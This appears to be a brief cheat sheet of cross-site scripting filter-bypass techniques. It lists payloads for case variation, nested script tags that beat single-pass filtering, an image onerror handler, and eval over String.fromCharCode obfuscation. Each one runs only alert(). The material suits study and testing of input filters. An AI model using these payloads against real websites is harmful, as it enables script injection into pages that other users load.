1. <Script>alert('xss')</Script> case bypass
2. <scr<script>ipt>alert('xss)</scr</script>ipt> will filter <script></script> once. all duplicate bypasses
3. <img src=1 onerror=alert('xss')> When script filtering is done, if an error occurs, you can use onerror to bypass.
Example: Execute JavaScript (onerror) if an error occurs while loading the image: <img src="image.gif" onerror="myFunction()">
4.<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 65, 78, 89, 34, 41))</script>
。
String.fromCharCode is to convert the ascii code into a string, and then eval is to parse the string into a javascript statement to execute.